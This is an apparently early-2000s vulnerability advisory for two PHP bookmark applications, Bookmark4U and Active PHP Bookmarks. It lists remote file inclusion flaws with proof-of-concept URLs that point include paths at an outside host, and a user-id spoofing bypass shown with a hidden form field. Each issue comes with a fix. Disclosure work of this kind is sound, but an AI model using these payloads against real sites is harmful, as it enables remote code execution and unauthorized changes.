Program: Bookmark4U V.1.8.3 website: http://bookmark4u.sourceforge.net/ Vendor status: Informed (30 days ago) Problem: Source injection Files affected: inc/dbase.php inc/config.php inc/common.load.php (?) Proof of concept: dbase.php?prefix=http://... Solution: The security of the inc/ directory is based on Apache authentication. file: inc/.htaccess (deny from all) Some default configurations (debian woody for example) have this authentication disabled so the files can be accessed. Edit your httpd.conf and turn the option AllowOverride from None to AuthConfig. Restart apache. Note: INSTALL.txt doesn't say nothing about it. ---------------------------------------------------------------------- Program: Active PHP Bookmarks (APB) V1.1.01 website: http://www.lbstone.com/apb/ Vendor status: Informed (30 days ago) Problem: 1) Source injection 2) Bookmarks and groups can be added without user registration 1) Source injection Files affected: File:Line:Code templates/head.php:14:include($APB_SETTINGS['template_path'] . "head_design.php"); apb_common.php:41:include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php'); apb_common.php:42:include_once($APB_SETTINGS['apb_path'].'apb_group_class.php'); apb_common.php:43:include_once($APB_SETTINGS['apb_path'].'apb_view_class.php'); apb_common.php:506:include($APB_SETTINGS['template_path'] . 'head.php'); apb_common.php:520:include($APB_SETTINGS['template_path'] . 'foot.php'); apb_view_class.php:48:include($APB_SETTINGS['template_path'] . $this->outer_file); Proof of concept: head.php?APB_SETTINGS%5Btemplate_path%5D=http://... Solution: Add the next lines: $APB_SETTINGS['apb_dir_name'] = 'bookmarks/'; // Change this value (apb_dir_name) if needed with your installation dir $APB_SETTINGS['apb_path'] = $DOCUMENT_ROOT . '/' . $APB_SETTINGS['apb_dir_name']; $APB_SETTINGS['template_path'] = $APB_SETTINGS['apb_path'] . 'templates/'; to the beginning of the files: templates/head.php abp_common.php and apb_view_class.php (Line 47, before the include (output function)) 2) Bookmarks and groups can be added without user registration Files affected: add_bookmark.php Description: The variable $APB_SETTINGS[auth_user_id] is not defined and can be passed through GET or POST to execute the form with any user id. Proof of concept: Load the form with ?APB_SETTINGS%5Bauth_user_id%5D=1 Submit the resultant form with the same variable, for example changing the action property of the form tag and adding it the next input: <input type="hidden" name="APB_SETTINGS%5Bauth_user_id%5D" value="1"> Solution: The easiest (and dirty) solution: Add to the beginning of the add_bookmarks.php file the next lines: if (($PHP_AUTH_USER!="xxxxxx") || ($PHP_AUTH_PW!="xxxxxx")) { header('WWW-Authenticate: Basic realm="Authorization Required"'); header('HTTP/1.0 401 Unauthorized'); echo 'Authorization Required.'; exit; } Change "xxxxxx" with your username and password. ---------------------------------------------------------------------- itzhak <itzhak@2500hz.net> 2500Hz Labs <www.2500hz.net> Greetings: aViNash, pantarhei, neuronal and Asejua
